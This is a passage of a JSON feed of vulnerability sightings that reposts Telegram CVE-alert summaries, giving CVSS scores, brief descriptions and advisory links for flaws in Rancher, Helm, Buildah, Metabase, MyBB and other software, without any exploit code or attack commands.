have at least some generic permissions on the type. \nThis issue affects rancher: before 2175e09, before 6e30359, before c744f0b.\n\ud83d\udccf Published: 2025-04-11T11:12:44.180Z\n\ud83d\udccf Modified: 2025-04-11T11:12:44.180Z\n\ud83d\udd17 References:\n1. https://bugzilla.suse.com/show_bug.cgi?id=CVE-2024-52280\n2. https://github.com/rancher/steve/security/advisories/GHSA-j5hq-5jcr-xwx7", "creation_timestamp": "2025-04-11T11:50:42.000000Z"}, {"uuid": "5648254d-5fea-4504-8450-a3739f8985e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8P83-CPFG-FJ3G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11412", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23391\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A Incorrect Privilege Assignment vulnerability in SUSE rancher allows a Restricted Administrator to change the password of Administrators and take over their accounts.\nThis issue affects rancher: from 2.8.0 before 2.8.14, from 2.9.0 before 2.9.8, from 2.10.0 before 2.10.4.\n\ud83d\udccf Published: 2025-04-11T10:38:43.642Z\n\ud83d\udccf Modified: 2025-04-11T10:38:43.642Z\n\ud83d\udd17 References:\n1. https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-23391\n2. https://github.com/rancher/rancher/security/advisories/GHSA-8p83-cpfg-fj3g", "creation_timestamp": "2025-04-11T10:50:12.000000Z"}, {"uuid": "5824a36b-5d64-45f1-9d92-c459a3ba0afe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8994", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-04-10T21:41:41.385Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2445\n18. https://access.redhat.com/errata/RHSA-2025:2449\n19. https://access.redhat.com/errata/RHSA-2025:2454\n20. https://access.redhat.com/errata/RHSA-2025:2701\n21. https://access.redhat.com/errata/RHSA-2025:2710\n22. https://access.redhat.com/errata/RHSA-2025:3301\n23. https://access.redhat.com/errata/RHSA-2025:3573\n24. https://access.redhat.com/security/cve/CVE-2024-9675\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-04-10T21:49:44.000000Z"}, {"uuid": "9cb05641-b1b6-4e06-8620-f41ad42666db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9C5P-35GJ-JQP4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11416", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-52282\n\ud83d\udd25 CVSS Score: 6.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N)\n\ud83d\udd39 Description: A Exposure of Sensitive Information to an Unauthorized Actor vulnerability in SUSE rancher allowing any users with GET\n access to the Rancher Manager Apps Catalog to read any sensitive information that are \ncontained within the Apps\u2019 values. Additionally, the same information \nleaks into auditing logs when the audit level is set to equal or above \n2.\n\nThis issue affects rancher: from 2.8.0 before 2.8.10, from 2.9.0 before 2.9.4.\n\ud83d\udccf Published: 2025-04-11T10:57:55.420Z\n\ud83d\udccf Modified: 2025-04-11T10:57:55.420Z\n\ud83d\udd17 References:\n1. https://bugzilla.suse.com/show_bug.cgi?id=CVE-2024-52282\n2. https://github.com/rancher/rancher/security/advisories/GHSA-9c5p-35gj-jqp4", "creation_timestamp": "2025-04-11T11:50:45.000000Z"}, {"uuid": "7d393415-fcea-4a1c-8af3-f6a7ff60320d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8717", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11163", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-8553\n\ud83d\udd25 CVSS Score: 6.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Foreman's loader macros introduced with report templates. These macros may allow an authenticated user with permissions to view and create templates to read any field from Foreman's database. By using specific strings in the loader macros, users can bypass permissions and access sensitive information.\n\ud83d\udccf Published: 2024-10-31T15:01:16.401Z\n\ud83d\udccf Modified: 2025-04-09T20:37:17.798Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8717\n2. https://access.redhat.com/errata/RHSA-2024:8718\n3. https://access.redhat.com/errata/RHSA-2024:8719\n4. https://access.redhat.com/errata/RHSA-2024:8906\n5. https://access.redhat.com/security/cve/CVE-2024-8553\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2312524", "creation_timestamp": "2025-04-09T20:48:26.000000Z"}, {"uuid": "1e16e358-ee10-4e84-9186-831f48d42ee6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G83V-7694-2HF7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11181", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24375\n\ud83d\udd25 CVSS Score: 5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: Charmed MySQL K8s operator is a Charmed Operator for running MySQL on Kubernetes. Before revision 221, the method for calling a SQL DDL or python based mysql-shell scripts can leak database users credentials. The method mysql-operator calls mysql-shell application rely on writing to a temporary script file containing the full URI, with user and password. The file can be read by a unprivileged user during the operator runtime, due it being created with read permissions (0x644). On other cases, when calling mysql cli, for one specific case when creating the operator users, the DDL contains said users credentials, which can be leak through the same mechanism of a temporary file. All versions prior to revision 221 for kubernetes and revision 338 for machine operators.\n\ud83d\udccf Published: 2025-04-09T22:21:37.858Z\n\ud83d\udccf Modified: 2025-04-09T22:21:37.858Z\n\ud83d\udd17 References:\n1. https://github.com/canonical/mysql-k8s-operator/security/advisories/GHSA-g83v-7694-2hf7\n2. https://github.com/canonical/mysql-k8s-operator/pull/553\n3. https://github.com/canonical/mysql-operator/pull/579\n4. https://github.com/canonical/mysql-k8s-operator/commit/7c6b1206fcbc7324b72f413c5e63216e742a71a1\n5. https://github.com/canonical/mysql-operator/commit/1fb61c1ee3e396cdce13d5e8155f2f32a860f89e", "creation_timestamp": "2025-04-09T22:48:55.000000Z"}, {"uuid": "f48cbd16-48bf-45f3-ba29-20f6fc96fe8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5XQW-8HWV-WG92", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11180", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32387\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Helm is a package manager for Charts for Kubernetes. A JSON Schema file within a chart can be crafted with a deeply nested chain of references, leading to parser recursion that can exceed the stack size limit and trigger a stack overflow. This issue has been resolved in Helm v3.17.3.\n\ud83d\udccf Published: 2025-04-09T22:28:33.476Z\n\ud83d\udccf Modified: 2025-04-09T22:28:33.476Z\n\ud83d\udd17 References:\n1. https://github.com/helm/helm/security/advisories/GHSA-5xqw-8hwv-wg92\n2. https://github.com/helm/helm/commit/d8ca55fc669645c10c0681d49723f4bb8c0b1ce7", "creation_timestamp": "2025-04-09T22:48:53.000000Z"}, {"uuid": "b6215a09-7e59-4029-979d-265fb5be6968", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-832J-56XW-5P7F", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11240", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32382\n\ud83d\udd25 CVSS Score: 1.8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N)\n\ud83d\udd39 Description: Metabase is an open source Business Intelligence and Embedded Analytics tool. When admins change Snowflake connection details in Metabase (either updating a password or changing password to private key or vice versa), Metabase would not always purge older Snowflake connection details from the application database. In order to remove older and stale connection details, Metabase would try one connection method at a time and purge all the other connection methods from the application database. When Metabase found a connection that worked, it would log (log/infof \"Successfully connected, migrating to: %s\" (pr-str test-details)) which would then print the username and password to the logger. This is fixed in 52.17.1, 53.9.5 and 54.1.5 in both the OSS and enterprise editions. Versions 51 and lower are not impacted.\n\ud83d\udccf Published: 2025-04-10T14:40:53.861Z\n\ud83d\udccf Modified: 2025-04-10T14:40:53.861Z\n\ud83d\udd17 References:\n1. https://github.com/metabase/metabase/security/advisories/GHSA-832j-56xw-5p7f", "creation_timestamp": "2025-04-10T14:50:21.000000Z"}, {"uuid": "5392e48d-7ad0-4e1e-af62-335e8f7627c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4HFP-H4CW-HJ8P", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11179", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32386\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Helm is a tool for managing Charts. A chart archive file can be crafted in a manner where it expands to be significantly larger uncompressed than compressed (e.g., &gt;800x difference). When Helm loads this specially crafted chart, memory can be exhausted causing the application to terminate. This issue has been resolved in Helm v3.17.3.\n\ud83d\udccf Published: 2025-04-09T22:28:44.142Z\n\ud83d\udccf Modified: 2025-04-09T22:28:44.142Z\n\ud83d\udd17 References:\n1. https://github.com/helm/helm/security/advisories/GHSA-4hfp-h4cw-hj8p\n2. https://github.com/helm/helm/commit/d8ca55fc669645c10c0681d49723f4bb8c0b1ce7", "creation_timestamp": "2025-04-09T22:48:52.000000Z"}, {"uuid": "49b76951-9851-46d8-aa80-250278afdb34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8263", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14322", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9341\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.\n\ud83d\udccf Published: 2024-10-01T18:52:00.686Z\n\ud83d\udccf Modified: 2025-05-01T15:56:31.977Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10147\n2. https://access.redhat.com/errata/RHSA-2024:10818\n3. https://access.redhat.com/errata/RHSA-2024:7925\n4. https://access.redhat.com/errata/RHSA-2024:8039\n5. https://access.redhat.com/errata/RHSA-2024:8112\n6. https://access.redhat.com/errata/RHSA-2024:8238\n7. https://access.redhat.com/errata/RHSA-2024:8263\n8. https://access.redhat.com/errata/RHSA-2024:8428\n9. https://access.redhat.com/errata/RHSA-2024:8690\n10. https://access.redhat.com/errata/RHSA-2024:8694\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:9454\n13. https://access.redhat.com/errata/RHSA-2024:9459\n14. https://access.redhat.com/security/cve/CVE-2024-9341\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2315691\n16. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169\n17. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349", "creation_timestamp": "2025-05-01T16:14:32.000000Z"}, {"uuid": "a66ac1fa-b597-4616-b4ed-0e8feeb823d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8428", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14322", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9341\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.\n\ud83d\udccf Published: 2024-10-01T18:52:00.686Z\n\ud83d\udccf Modified: 2025-05-01T15:56:31.977Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10147\n2. https://access.redhat.com/errata/RHSA-2024:10818\n3. https://access.redhat.com/errata/RHSA-2024:7925\n4. https://access.redhat.com/errata/RHSA-2024:8039\n5. https://access.redhat.com/errata/RHSA-2024:8112\n6. https://access.redhat.com/errata/RHSA-2024:8238\n7. https://access.redhat.com/errata/RHSA-2024:8263\n8. https://access.redhat.com/errata/RHSA-2024:8428\n9. https://access.redhat.com/errata/RHSA-2024:8690\n10. https://access.redhat.com/errata/RHSA-2024:8694\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:9454\n13. https://access.redhat.com/errata/RHSA-2024:9459\n14. https://access.redhat.com/security/cve/CVE-2024-9341\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2315691\n16. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169\n17. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349", "creation_timestamp": "2025-05-01T16:14:32.000000Z"}, {"uuid": "7636999e-4987-40af-aff5-2f13abc9fe79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9P62-X3C5-HR5P", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11318", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-46178\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L)\n\ud83d\udd39 Description: MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.1 allow users to upload a file, but do not validate the file name, which may lead to upload file to any path. The vulnerability has been fixed in v2.5.1. There are no workarounds.\n\ud83d\udccf Published: 2022-12-29T18:09:38.842Z\n\ud83d\udccf Modified: 2025-04-10T19:41:30.356Z\n\ud83d\udd17 References:\n1. https://github.com/metersphere/metersphere/security/advisories/GHSA-9p62-x3c5-hr5p", "creation_timestamp": "2025-04-10T19:49:03.000000Z"}, {"uuid": "9b23ddde-1210-4fb2-849e-9afb85233c17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9454", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14322", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9341\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.\n\ud83d\udccf Published: 2024-10-01T18:52:00.686Z\n\ud83d\udccf Modified: 2025-05-01T15:56:31.977Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10147\n2. https://access.redhat.com/errata/RHSA-2024:10818\n3. https://access.redhat.com/errata/RHSA-2024:7925\n4. https://access.redhat.com/errata/RHSA-2024:8039\n5. https://access.redhat.com/errata/RHSA-2024:8112\n6. https://access.redhat.com/errata/RHSA-2024:8238\n7. https://access.redhat.com/errata/RHSA-2024:8263\n8. https://access.redhat.com/errata/RHSA-2024:8428\n9. https://access.redhat.com/errata/RHSA-2024:8690\n10. https://access.redhat.com/errata/RHSA-2024:8694\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:9454\n13. https://access.redhat.com/errata/RHSA-2024:9459\n14. https://access.redhat.com/security/cve/CVE-2024-9341\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2315691\n16. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169\n17. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349", "creation_timestamp": "2025-05-01T16:14:32.000000Z"}, {"uuid": "f5483525-ac9e-434f-af39-d29bed1d9c3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8238", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14322", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9341\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.\n\ud83d\udccf Published: 2024-10-01T18:52:00.686Z\n\ud83d\udccf Modified: 2025-05-01T15:56:31.977Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10147\n2. https://access.redhat.com/errata/RHSA-2024:10818\n3. https://access.redhat.com/errata/RHSA-2024:7925\n4. https://access.redhat.com/errata/RHSA-2024:8039\n5. https://access.redhat.com/errata/RHSA-2024:8112\n6. https://access.redhat.com/errata/RHSA-2024:8238\n7. https://access.redhat.com/errata/RHSA-2024:8263\n8. https://access.redhat.com/errata/RHSA-2024:8428\n9. https://access.redhat.com/errata/RHSA-2024:8690\n10. https://access.redhat.com/errata/RHSA-2024:8694\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:9454\n13. https://access.redhat.com/errata/RHSA-2024:9459\n14. https://access.redhat.com/security/cve/CVE-2024-9341\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2315691\n16. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169\n17. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349", "creation_timestamp": "2025-05-01T16:14:32.000000Z"}, {"uuid": "ac7d9076-b571-4891-9f71-863c0b092fd2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CPFV-6F8W-759R", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11264", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-45867\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: MyBB before 1.8.33 allows Directory Traversal. The Admin CP Languages module allows remote authenticated users, with high privileges, to achieve local file inclusion and execution.\n\ud83d\udccf Published: 2023-01-03T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-10T15:24:04.427Z\n\ud83d\udd17 References:\n1. https://github.com/mybb/mybb/security/advisories/GHSA-cpfv-6f8w-759r", "creation_timestamp": "2025-04-10T15:49:11.000000Z"}, {"uuid": "53bbc617-7157-415b-bcb6-bc5da6071dac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:6575", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14327", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-3576\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Libtiff's tiffcrop utility. This issue occurs when tiffcrop operates on a TIFF image file, allowing an attacker to pass a crafted TIFF image file to tiffcrop utility, which causes this memory leak issue, resulting an application crash, eventually leading to a denial of service.\n\ud83d\udccf Published: 2023-10-04T18:02:23.926Z\n\ud83d\udccf Modified: 2025-05-01T15:51:30.642Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:6575\n2. https://access.redhat.com/security/cve/CVE-2023-3576\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2219340", "creation_timestamp": "2025-05-01T16:14:40.000000Z"}, {"uuid": "0c414844-0d30-494b-a6ae-a33328b64e57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JF52-3F2H-H9J5", "type": "published-proof-of-concept", "source": "Telegram/2H0tuRFHJAYb3wZdMSBr18E38TWvMjuQyl8zYKGk_wJ2kf8", "content": "", "creation_timestamp": "2026-01-08T11:01:23.000000Z"}, {"uuid": "367cdc9f-7b37-488b-aecf-521a471f2188", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4FV8-W65M-3932", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11441", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-46174\n\ud83d\udd25 CVSS Score: 4.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L)\n\ud83d\udd39 Description: efs-utils is a set of Utilities for Amazon Elastic File System (EFS). A potential race condition issue exists within the Amazon EFS mount helper in efs-utils versions v1.34.3 and below. When using TLS to mount file systems, the mount helper allocates a local port for stunnel to receive NFS connections prior to applying the TLS tunnel. In affected versions, concurrent mount operations can allocate the same local port, leading to either failed mount operations or an inappropriate mapping from an EFS customer\u2019s local mount points to that customer\u2019s EFS file systems. This issue is patched in version v1.34.4. There is no recommended work around. We recommend affected users update the installed version of efs-utils to v1.34.4 or later.\n\ud83d\udccf Published: 2022-12-28T06:46:43.859Z\n\ud83d\udccf Modified: 2025-04-11T15:45:05.380Z\n\ud83d\udd17 References:\n1. https://github.com/aws/efs-utils/security/advisories/GHSA-4fv8-w65m-3932\n2. https://github.com/aws/efs-utils/issues/125\n3. https://github.com/aws/efs-utils/commit/f3a8f88167d55caa2f78aeb72d4dc1987a9ed62d", "creation_timestamp": "2025-04-11T15:50:46.000000Z"}, {"uuid": "ca468ef6-220e-45b2-91db-2101e792340e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C5HG-MR8R-F6JP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11493", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-36437\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: The Connection handler in Hazelcast and Hazelcast Jet allows a remote unauthenticated attacker to access and manipulate data in the cluster with the identity of another already authenticated connection. The affected Hazelcast versions are through 4.0.6, 4.1.9, 4.2.5, 5.0.3, and 5.1.2. The affected Hazelcast Jet versions are through 4.5.3.\n\ud83d\udccf Published: 2022-12-29T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-11T22:46:33.774Z\n\ud83d\udd17 References:\n1. https://github.com/hazelcast/hazelcast/security/advisories/GHSA-c5hg-mr8r-f6jp", "creation_timestamp": "2025-04-11T22:51:19.000000Z"}, {"uuid": "94b81ae3-1f7b-435c-8d79-42b480f7be58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6X3M-96QP-MMXV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11646", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-41967\n\ud83d\udd25 CVSS Score: 7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L)\n\ud83d\udd39 Description: Dragonfly is a Java runtime dependency management library. Dragonfly v0.3.0-SNAPSHOT does not configure DocumentBuilderFactory to prevent XML external entity (XXE) attacks. This issue is patched in 0.3.1-SNAPSHOT. As a workaround, since Dragonfly only parses XML `SNAPSHOT` versions are being resolved, this vulnerability may be avoided by not trying to resolve `SNAPSHOT` versions.\n\ud83d\udccf Published: 2022-12-27T23:45:00.786Z\n\ud83d\udccf Modified: 2025-04-14T16:23:21.201Z\n\ud83d\udd17 References:\n1. https://github.com/HyperaDev/Dragonfly/security/advisories/GHSA-6x3m-96qp-mmxv\n2. https://github.com/HyperaDev/Dragonfly/commit/9661375e1135127ca6cdb5712e978bec33cc06b3", "creation_timestamp": "2025-04-14T16:53:39.000000Z"}, {"uuid": "01150683-e4fc-412a-bf1d-4057ba8b3a7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RCG9-7FQM-83MQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11684", "content": "\ud83d\udd17 DarkWebInformer.com - 